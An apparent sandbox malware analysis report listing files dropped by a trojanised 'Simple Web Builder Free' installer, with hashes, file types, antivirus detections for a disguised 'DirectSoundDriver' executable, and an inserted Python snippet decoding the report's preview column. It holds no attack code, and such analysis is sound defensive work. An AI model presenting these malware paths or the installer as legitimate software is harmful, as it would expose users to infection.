Entropy (8bit): 0.8439810553697228
Encrypted: false
SSDEEP: 24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5: 9D46F142BBCF25D0D495FF1F3A7609D3
SHA1: 629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256: C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512: AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136413900497188
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5: 429F49156428FD53EB06FC82088FD324
SHA1: 560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256: 9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512: 1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious: false
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1888210
                                                                                                                          Entropy (8bit):6.979353805786148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:lHZ2IxEvbn0MdESx+ZFehvnATV3oR6GKIlb/xBxlKtIH6/qKsTRBEqkF71elDPIL:lJxEvnE6oUhPATV4RsIb/xBxlKe27Qu
                                                                                                                          MD5:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          SHA1:6098711FD405855097A78442A8A195E04BFAB1CD
                                                                                                                          SHA-256:BA6625BECE4E980DE77E555B8626F63BEC81CA9BA3E40701F7ED201DB25153FD
                                                                                                                          SHA-512:8DF13158A2D806A6E2D49CECA8DEE411E07F96F63876DBD64E6ED3424765062312AC1C4E7EB0EB7683443240B9B52022F8977094063A1509395A6C45BEEC6893
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.121297215059106
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.8307187998793589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugw:gJjJGtpTq2yv1AuNZRY3diu8iBVqFy
                                                                                                                          MD5:F653F49EB4E03B5702FA1F65EFCDAD47
                                                                                                                          SHA1:A34388C6FE8FC8B65140FB5834803FBDBAEB6CA5
                                                                                                                          SHA-256:C710B8F336AFC7017EB91299C85D5232DFEA87CA2C359F313135C5B5E07B0393
                                                                                                                          SHA-512:61C327C77B33E2F86CD997956E793C92A355DB4094ABEE226279C9DD906930A67E07CCD00C51EF8962B37330B45BEE59D048B6739A36E7AECE6021BE28E400A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb12a3052, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.6585732542421516
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                          MD5:88EA1DCE28C00796DF2528433DFEA0F1
                                                                                                                          SHA1:54B22C4233B98CFF37D3F5FE8102714DD3F0E352
                                                                                                                          SHA-256:9AFED7E27560DA3F514B85B098312B7016B60E64BCB8E57EC4099D15E6C9C9BC
                                                                                                                          SHA-512:B5AE9023F5F2406205DC1AC606436C0D4A2211272BACCC8D6C1983A1151CE2F0528CB1FF2625E2E9BF02C7B84E7600C72F2F4796FCF0DAE41EA9AEEE0E753BC2
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.08072633064392432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:n1/llKYeWMzltGuAJkhvekl1qyH/AllrekGltll/SPj:HlKz1ZtrxlvfAJe3l
                                                                                                                          MD5:2C294982ECFE7A37E5F6FE849A769645
                                                                                                                          SHA1:96D0654FF784D721EDCA3D02C326FB057C586794
                                                                                                                          SHA-256:1E881C3820D32C394D01169B0E4BC95C5FEF75ACD32B3A59B26834A5FD6E884C
                                                                                                                          SHA-512:929115FAE1B7575462AEB94855D9966812D0C5AC4937F86FBD71164E7066A57D139885D323AAEAC33CCD67F129B9CA3BD669815B802D283E9BEE35AA4DEDC327
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105090
                                                                                                                          Entropy (8bit):3.0801252322244173
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:S2fuymxE7GD7T62DugrEj/5MdDaBC46+2+s+o+6+9+i+m+Rvo+M+w+E+o+T+o+Z4:8
                                                                                                                          MD5:D649A2A3582414314A1121C9A6AE34E4
                                                                                                                          SHA1:2D49675B269D721BBF0A01D1329BF14146B7B051
                                                                                                                          SHA-256:EB956A234C6884D85983825D45684941CE00E1F219A5E30A8DF45E978F891B79
                                                                                                                          SHA-512:6BD84405538409230A8B60906B30ACE641377ECBDA2D82EF4F394CDBDACA3D72E58165D13C2CA60E6ACBC515B78FFEA35CA5AEEF3EF138DE46E91A4A82DA7B12
                                                                                                                          Malicious:false
                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13340
                                                                                                                          Entropy (8bit):2.695816926002427
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TiZYWcLS+lieYqYcUBWrNDhHRUYEZmEtFiN0ettwOzNnTxlaBr0BMYqwCInhF:2ZDWP9hNfVxPaN0BMlwlnhF
                                                                                                                          MD5:729D23135ACD62FC075AD0E3D6B53443
                                                                                                                          SHA1:00CC2C4038D8BAACF0C33821270BD0990CFA9912
                                                                                                                          SHA-256:97EB1C1870A84378C29C94234EE4BF1F5A2416002E848EE4D43FF6BD017E3CA1
                                                                                                                          SHA-512:65C347E0EA5CF5D61F029570F494189DF7C2EFA782ECCF02BFD93D34DB5C509F0AF8EE15D1CC5DEB6DD64BF1DCB648CB62B980055B53CEFB2E2F59B2D25FA6A5
                                                                                                                          Malicious:false
                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112642
                                                                                                                          Entropy (8bit):3.0797128617955827
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:4e/waNT4x662Dt4pOJeQlg3IjDh/+46+2+s+o+6+9+i+m+Rvo+M+w+E+o+T+o+ZN:V
                                                                                                                          MD5:8F7FEB45CB187B4B6EDF07BE841E43F4
                                                                                                                          SHA1:321C0E6B34D081B6ECD65284A595D450C3DDC64C
                                                                                                                          SHA-256:9135B5655EA37079ED0C46DB025F505C80CAE0F1C380DCBBF86244858506231E
                                                                                                                          SHA-512:DB866A1178D838C84C2F5D87BBD0FA3F299C57280A96DAE0D11559A5F6EEF087D0A52884C45F3805F024DABB5FFD00369E88A966A220A2F20064B1F7F9E7B046
                                                                                                                          Malicious:false
                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):113468
                                                                                                                          Entropy (8bit):3.080091859309462
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:bEET47wqpFKs9DVQyjLbS9q46+2+s+o+6+9+i+m+Rvo+M+w+E+o+T+o+Z2+P+yrN:H
                                                                                                                          MD5:58B26093E95C6A18E2079D197D6F5EB5
                                                                                                                          SHA1:3A3DEE2ADAEC8E301ACEC88D615F1880C55FAE6D
                                                                                                                          SHA-256:BE9C6205A820E18589F3BE20AB5E5DEDA33680F59DBDFB6F9E3D636FA4398E2E
                                                                                                                          SHA-512:D4A31530FEA4F9A1B9E9CEB0EE82C1E02FF66A26AB0ACDEB3A225E0E494832CC2F56DD8E713C3C35D31C261166F96867337F5E2F2E4D653423219940EE6C58D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13340
                                                                                                                          Entropy (8bit):2.6976344757843065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TiZYWs6FecEkYOxYIWDAhHSEUYEZbUtFiF04t+wlCqaY0MMUNw8I5hC:2ZD19/xoRJ5aY0MMew75hC
                                                                                                                          MD5:D12DC2FCB8AF8CE505F62F71D4FC6F07
                                                                                                                          SHA1:EB40CF7B90AB42AD414AB04E51817A73E90B20B9
                                                                                                                          SHA-256:337E14BEC29169F2AC60AFABD36D6E95C9A2904E80FB7DE00531079E88C288DA
                                                                                                                          SHA-512:4BFE7DC60BEF8CBFFC37E968C0226BDF970C91A03E53DB70AF6361691508A504941E6BBD7794049F91750CBA702469AB12E620F3BA1E0ACCE06C2359535F5F18
                                                                                                                          Malicious:false
                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13340
                                                                                                                          Entropy (8bit):2.6978252479618203
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:TiZYWJHRs7YAYJWT/hH/UYEZjxtFi60btI6wMIhDa2x0kMdwRIQhV:2ZDSHo0MDam0kMdwOQhV
                                                                                                                          MD5:36CB5748D30D370089A4084943E7C949
                                                                                                                          SHA1:F7FCAF66E7E19FA6616DAB3F446230A678379203
                                                                                                                          SHA-256:DEBC90E7E7A38C90C1B4724F021DFB1274ADD6BC70A315CEED70497AFCA69647
                                                                                                                          SHA-512:E0F7F4A758F01C72A9C3E56E7B2FF0271879AFDAA0ECEAD0068F9273D0152CF1ABB790A71BBA959F5A79CB235683C467B36146D4F6F0E227D401E538D740F9CF
                                                                                                                          Malicious:false
                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
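The four svchost.exe records above are UTF-16LE text (a SystemBasicInformation dump and a process-list CSV beginning "ImageName,UniqueProcessId,..."), which the report's Preview column renders byte by byte, printable ASCII kept and every other byte shown as ".". The following added example, not part of the Joe Sandbox report, reproduces that rendering and recovers the text from the raw bytes, so a preview like "I.m.a.g.e.N.a.m.e.,." can be read without opening the dropped file. The sample inputs are constructed here and are not the dropped files themselves.

```python
"""Render and decode the hex-dump style 'Preview' column of a sandbox report.

Added example, not Joe Sandbox code. The report shows each byte of a dropped
file as itself when it is printable ASCII and as '.' otherwise, so UTF-16LE
text appears as 'I.m.a.g.e.N.a.m.e.,.'. Sample inputs below are constructed.
"""
import string

PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " ")


def render_preview(data: bytes, limit: int = 1024) -> str:
    """Render bytes the way the report's Preview column does."""
    return "".join(chr(b) if chr(b) in PRINTABLE else "." for b in data[:limit])


def looks_like_utf16le(data: bytes, min_ratio: float = 0.9) -> bool:
    """Heuristic: in UTF-16LE text from the Latin range nearly every odd byte is 0x00."""
    if len(data) < 4:
        return False
    high_bytes = data[1::2]
    return high_bytes.count(0) / len(high_bytes) >= min_ratio


def decode_text(data: bytes) -> str:
    """Decode as UTF-16LE when the NUL pattern indicates it, otherwise as latin-1."""
    if looks_like_utf16le(data):
        return data.decode("utf-16-le", errors="replace").rstrip("\x00")
    return data.decode("latin-1")


def undot_preview(preview: str) -> str:
    """Best-effort inverse when only the rendered preview of UTF-16LE text is available.

    Drops the '.' standing in for each NUL high byte. Valid only when the text
    started at offset 0 and is ASCII; a length prefix such as the 'B...' in the
    SystemBasicInformation dumps survives as stray characters.
    """
    return preview[0::2]


if __name__ == "__main__":
    # Constructed sample: the header row seen in the process-list dumps above.
    sample = "ImageName,UniqueProcessId,NumberOfThreads".encode("utf-16-le")
    shown = render_preview(sample)
    print(shown)
    print(decode_text(sample))
    print(undot_preview(shown))
```

For a file pulled from the sandbox, pass its bytes to decode_text(); undot_preview() is only for the case where the report text is all that is left.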
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:r:r
                                                                                                                          MD5:1036E3DDDC89A4E68D8A33F3823A180E
                                                                                                                          SHA1:D6459AB29C7B9A9FBF0C7C15FA35FAA30FBF8CC6
                                                                                                                          SHA-256:FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02
                                                                                                                          SHA-512:9DB5EA5024F5A3AF2B82E9B346AA029EA45364CA0361BB2BCFE7040B869DDE1177D8FDC36C508BD81BDD03913CC9DAD429C301A3232759B732AB976CCE929971
                                                                                                                          Malicious:false
                                                                                                                          Preview:....
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128
                                                                                                                          Entropy (8bit):2.9545817380615236
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                          MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                          SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                          SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                          SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                          Malicious:false
                                                                                                                          Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128
                                                                                                                          Entropy (8bit):1.2701231977328944
                                                                                                                          Encrypted:false
